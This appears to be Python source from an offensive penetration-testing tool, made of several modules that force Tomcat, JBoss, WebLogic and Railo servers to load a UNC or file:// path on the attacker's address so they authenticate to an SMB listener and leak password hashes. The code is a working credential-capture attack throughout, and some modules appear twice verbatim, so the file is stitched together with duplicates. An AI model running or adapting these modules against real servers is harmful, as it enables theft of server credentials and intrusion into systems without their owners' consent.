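def run(self, fingerengine, fingerprint):
    """ Same concept as the JBoss module, except we actually invoke the
    deploy function: the Tomcat Manager is asked to deploy a WAR from a
    file:// path on our own address, which makes the server reach back to
    our SMB listener and authenticate.

    fingerengine -- supplies options.ip (the target address)
    fingerprint  -- supplies port, version and title

    Requires root (check_admin), presumably because the SMB listener binds
    a privileged port.  Tomcat 5.5 is driven from here; 6.0/7.0/8.0 are
    handed to self.runLatter together with the listener thread.  The
    listener is only started once the version is known to be supported,
    and on the 5.5 path it is told to stop on every exit (auth failure,
    exception, normal completion) so no thread is left running.
    """

    if not utility.check_admin():
        utility.Msg("Root privs required for this module.", LOG.ERROR)
        return

    legacy = fingerprint.version in ["5.5"]
    if not legacy and fingerprint.version not in ["6.0", "7.0", "8.0"]:
        utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR)
        return

    utility.Msg("Setting up SMB listener...")
    self._Listen = True
    thread = Thread(target=self.smb_listener)
    thread.start()

    utility.Msg("Invoking UNC deployer...")

    if not legacy:
        # runLatter owns the listener thread (and its shutdown) from here on
        return self.runLatter(fingerengine, fingerprint, thread)

    try:
        base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
        uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\
              'deployWar=file://{0}/asdf.war'.format(utility.local_address())
        url = base + uri

        response = utility.requests_get(url)

        if response.status_code == 401:
            utility.Msg("Host %s:%s requires auth, checking..." %
                        (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
            cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                                fingerprint.title, fingerprint.version)
            if not cookies:
                utility.Msg("Could not get auth for %s:%s" %
                            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

            response = utility.requests_get(url, cookies=cookies[0],
                                            auth=cookies[1])

        # block until the listener thread exits
        while thread.is_alive():
            sleep(1)

        # anything but 200 from the Manager is worth a debug line
        if response.status_code != 200:
            utility.Msg("Unexpected response: HTTP %d" % response.status_code,
                        LOG.DEBUG)
    finally:
        # stop the listener on every exit path, not just the happy one
        self._Listen = False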
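def run(self, fingerengine, fingerprint):
    """ Same as JBoss/Tomcat: the WebLogic console is asked to install an
    application from a UNC path on our own address, so the server reaches
    back to our SMB listener and authenticates.

    fingerengine -- supplies options.ip (the target address)
    fingerprint  -- supplies port and title

    Requires root (check_admin).  The listener is only started once a
    console session has been obtained, and it is told to stop on every
    exit path (CSRF fetch failure, request error, normal completion).
    """

    if not utility.check_admin():
        utility.Msg("Root privs required for this module.", LOG.ERROR)
        return

    # The WLS interface is reached over https.  Build the scheme explicitly
    # instead of str.replace()-ing "http" in the assembled URL: replace()
    # rewrites every occurrence, including any "http" inside the target
    # address itself.
    scheme = 'https' if fingerprint.title == WINTERFACES.WLS else 'http'
    base = '{0}://{1}:{2}'.format(scheme, fingerengine.options.ip,
                                  fingerprint.port)
    uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\
          '=/com/bea/console/actions/app/install/appSelected'
    data = {
        "AppApplicationInstallPortletselectedAppPath":
            "\\\\{0}\\fdas.war".format(utility.local_address()),
        "AppApplicationInstallPortletfrsc": None,
    }

    utility.Msg("Host %s:%s requires auth, checking.." %
                (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
    cookies = checkAuth(fingerengine.options.ip, fingerprint)
    # checkAuth is assumed to return a pair whose first item is the cookie
    # jar; guard against a None return so a failed login is reported rather
    # than raising on the index
    if not cookies or not cookies[0]:
        utility.Msg("Could not get auth for %s:%s" %
                    (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
        return

    utility.Msg("Setting up SMB listener...")
    self._Listen = True
    thread = Thread(target=self.smb_listener)
    thread.start()

    try:
        # fetch our CSRF token for the install portlet
        data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(base,
                                                                  cookies[0])

        utility.Msg("Invoking UNC loader...")
        try:
            utility.requests_post(base + uri, data=data, cookies=cookies[0],
                                  timeout=1.0)
        except Exception as e:
            # best effort: the response itself is irrelevant, and the short
            # timeout makes an exception here the normal outcome; just log it
            utility.Msg("UNC loader request ended: %s" % e, LOG.DEBUG)

        # block until the listener thread exits
        while thread.is_alive():
            sleep(1)
    finally:
        # stop the listener on every exit path, not just the happy one
        self._Listen = False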
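def run(self, fingerengine, fingerprint):
    """ This module will invoke jboss:load() with a UNC path to force the
    server to make a SMB request, thus giving up its encrypted hash with
    a value we know (1122334455667788).

    Thanks to @cd1zz for the idea for this

    fingerengine -- supplies options.ip (the target address)
    fingerprint  -- supplies port, version and title

    Requires root (check_admin).  The listener is told to stop on every
    exit path (auth failure, request error, normal completion) so no
    thread is left running behind a failed attempt.
    """

    if not utility.check_admin():
        utility.Msg("Root privs required for this module.", LOG.ERROR)
        return

    utility.Msg("Setting up SMB listener..")
    self._Listen = True
    thread = Thread(target=self.smb_listener)
    thread.start()

    try:
        utility.Msg("Invoking UNC loader...")
        base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
        uri = '/jmx-console/HtmlAdaptor'
        url = base + uri
        # version-specific form data for the HtmlAdaptor load() invocation
        data = self.getData(fingerprint.version)

        response = utility.requests_post(url, data=data)

        if response.status_code == 401:
            utility.Msg("Host %s:%s requires auth, checking..." %
                        (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
            cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                                fingerprint.title, fingerprint.version)
            if not cookies:
                utility.Msg("Could not get auth for %s:%s" %
                            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

            response = utility.requests_post(url, data=data, cookies=cookies[0],
                                             auth=cookies[1])

        # block until the listener thread exits
        while thread.is_alive():
            sleep(1)

        # HTTP 500 is the expected reply here; anything else is noted
        if response.status_code != 500:
            utility.Msg("Unexpected response: HTTP %d" % response.status_code,
                        LOG.DEBUG)
    finally:
        # stop the listener on every exit path, not just the happy one
        self._Listen = False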
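def run(self, fingerengine, fingerprint):
    """ Same concept as the JBoss module, except we actually invoke the
    deploy function: the Tomcat Manager is asked to deploy a WAR from a
    file:// path on our own address, which makes the server reach back to
    our SMB listener and authenticate.

    fingerengine -- supplies options.ip (the target address)
    fingerprint  -- supplies port, version and title

    Requires root (check_admin), presumably because the SMB listener binds
    a privileged port.  Tomcat 5.5 is driven from here; 6.0/7.0/8.0 are
    handed to self.runLatter together with the listener thread.  The
    listener is only started once the version is known to be supported,
    and on the 5.5 path it is told to stop on every exit (auth failure,
    exception, normal completion) so no thread is left running.
    """

    if not utility.check_admin():
        utility.Msg("Root privs required for this module.", LOG.ERROR)
        return

    legacy = fingerprint.version in ["5.5"]
    if not legacy and fingerprint.version not in ["6.0", "7.0", "8.0"]:
        utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR)
        return

    utility.Msg("Setting up SMB listener...")
    self._Listen = True
    thread = Thread(target=self.smb_listener)
    thread.start()

    utility.Msg("Invoking UNC deployer...")

    if not legacy:
        # runLatter owns the listener thread (and its shutdown) from here on
        return self.runLatter(fingerengine, fingerprint, thread)

    try:
        base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
        uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\
              'deployWar=file://{0}/asdf.war'.format(utility.local_address())
        url = base + uri

        response = utility.requests_get(url)

        if response.status_code == 401:
            utility.Msg("Host %s:%s requires auth, checking..." %
                        (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
            cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                                fingerprint.title, fingerprint.version)
            if not cookies:
                utility.Msg("Could not get auth for %s:%s" %
                            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

            response = utility.requests_get(url, cookies=cookies[0],
                                            auth=cookies[1])

        # block until the listener thread exits
        while thread.is_alive():
            sleep(1)

        # anything but 200 from the Manager is worth a debug line
        if response.status_code != 200:
            utility.Msg("Unexpected response: HTTP %d" % response.status_code,
                        LOG.DEBUG)
    finally:
        # stop the listener on every exit path, not just the happy one
        self._Listen = False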
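def run(self, fingerengine, fingerprint):
    """ This module will invoke jboss:load() with a UNC path to force the
    server to make a SMB request, thus giving up its encrypted hash with
    a value we know (1122334455667788).

    Thanks to @cd1zz for the idea for this

    fingerengine -- supplies options.ip (the target address)
    fingerprint  -- supplies port, version and title

    Requires root (check_admin).  The listener is told to stop on every
    exit path (auth failure, request error, normal completion) so no
    thread is left running behind a failed attempt.
    """

    if not utility.check_admin():
        utility.Msg("Root privs required for this module.", LOG.ERROR)
        return

    utility.Msg("Setting up SMB listener..")
    self._Listen = True
    thread = Thread(target=self.smb_listener)
    thread.start()

    try:
        utility.Msg("Invoking UNC loader...")
        base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
        uri = '/jmx-console/HtmlAdaptor'
        url = base + uri
        # version-specific form data for the HtmlAdaptor load() invocation
        data = self.getData(fingerprint.version)

        response = utility.requests_post(url, data=data)

        if response.status_code == 401:
            utility.Msg("Host %s:%s requires auth, checking..." %
                        (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
            cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                                fingerprint.title, fingerprint.version)
            if not cookies:
                utility.Msg("Could not get auth for %s:%s" %
                            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

            response = utility.requests_post(url, data=data, cookies=cookies[0],
                                             auth=cookies[1])

        # block until the listener thread exits
        while thread.is_alive():
            sleep(1)

        # HTTP 500 is the expected reply here; anything else is noted
        if response.status_code != 500:
            utility.Msg("Unexpected response: HTTP %d" % response.status_code,
                        LOG.DEBUG)
    finally:
        # stop the listener on every exit path, not just the happy one
        self._Listen = False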
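def run(self, fingerengine, fingerprint):
    """ Same as JBoss/Tomcat: the WebLogic console is asked to install an
    application from a UNC path on our own address, so the server reaches
    back to our SMB listener and authenticates.

    fingerengine -- supplies options.ip (the target address)
    fingerprint  -- supplies port and title

    Requires root (check_admin).  The listener is only started once a
    console session has been obtained, and it is told to stop on every
    exit path (CSRF fetch failure, request error, normal completion).
    """

    if not utility.check_admin():
        utility.Msg("Root privs required for this module.", LOG.ERROR)
        return

    # The WLS interface is reached over https.  Build the scheme explicitly
    # instead of str.replace()-ing "http" in the assembled URL: replace()
    # rewrites every occurrence, including any "http" inside the target
    # address itself.
    scheme = 'https' if fingerprint.title == WINTERFACES.WLS else 'http'
    base = '{0}://{1}:{2}'.format(scheme, fingerengine.options.ip,
                                  fingerprint.port)
    uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\
          '=/com/bea/console/actions/app/install/appSelected'
    data = {
        "AppApplicationInstallPortletselectedAppPath":
            "\\\\{0}\\fdas.war".format(utility.local_address()),
        "AppApplicationInstallPortletfrsc": None,
    }

    utility.Msg("Host %s:%s requires auth, checking.." %
                (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
    cookies = checkAuth(fingerengine.options.ip, fingerprint)
    # checkAuth is assumed to return a pair whose first item is the cookie
    # jar; guard against a None return so a failed login is reported rather
    # than raising on the index
    if not cookies or not cookies[0]:
        utility.Msg("Could not get auth for %s:%s" %
                    (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
        return

    utility.Msg("Setting up SMB listener...")
    self._Listen = True
    thread = Thread(target=self.smb_listener)
    thread.start()

    try:
        # fetch our CSRF token for the install portlet
        data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(base,
                                                                  cookies[0])

        utility.Msg("Invoking UNC loader...")
        try:
            utility.requests_post(base + uri, data=data, cookies=cookies[0],
                                  timeout=1.0)
        except Exception as e:
            # best effort: the response itself is irrelevant, and the short
            # timeout makes an exception here the normal outcome; just log it
            utility.Msg("UNC loader request ended: %s" % e, LOG.DEBUG)

        # block until the listener thread exits
        while thread.is_alive():
            sleep(1)
    finally:
        # stop the listener on every exit path, not just the happy one
        self._Listen = False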
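def run(self, fingerengine, fingerprint):
    """ Create a search collection via a nonexistent datasource: the Railo
    web admin is asked to create a collection whose path is a UNC share on
    our own address, so the server reaches back to our SMB listener and
    authenticates.

    fingerengine -- supplies options.ip (the target address)
    fingerprint  -- supplies port and title

    Requires root (check_admin).  The listener is told to stop on every
    exit path (auth failure, request error, normal completion) so no
    thread is left running behind a failed attempt.
    """

    if not utility.check_admin():
        utility.Msg("Root privs required for this module.", LOG.ERROR)
        return

    utility.Msg("Setting up SMB listener...")
    self._Listen = True
    thread = Thread(target=self.smb_listener)
    thread.start()

    try:
        utility.Msg("Invoking UNC deployer...")
        base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
        uri = "/railo-context/admin/web.cfm?action=services.search"
        url = base + uri
        data = {
            "collName": "asdf",
            "collPath": "\\\\{0}\\asdf".format(utility.local_address()),
            "collLanguage": "english",
            "run": "create",
        }

        # the web admin always needs a session here (no unauthenticated probe)
        cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                            fingerprint.title)
        if not cookies:
            utility.Msg("Could not get auth for %s:%s" %
                        (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
            return

        response = utility.requests_post(url, data=data, cookies=cookies)

        # block until the listener thread exits
        while thread.is_alive():
            sleep(1)

        # anything but 200 from the admin is worth a debug line
        if response.status_code != 200:
            utility.Msg("Unexpected response: HTTP %d" % response.status_code,
                        LOG.DEBUG)
    finally:
        # stop the listener on every exit path, including an exception from
        # the request, not just the happy one
        self._Listen = False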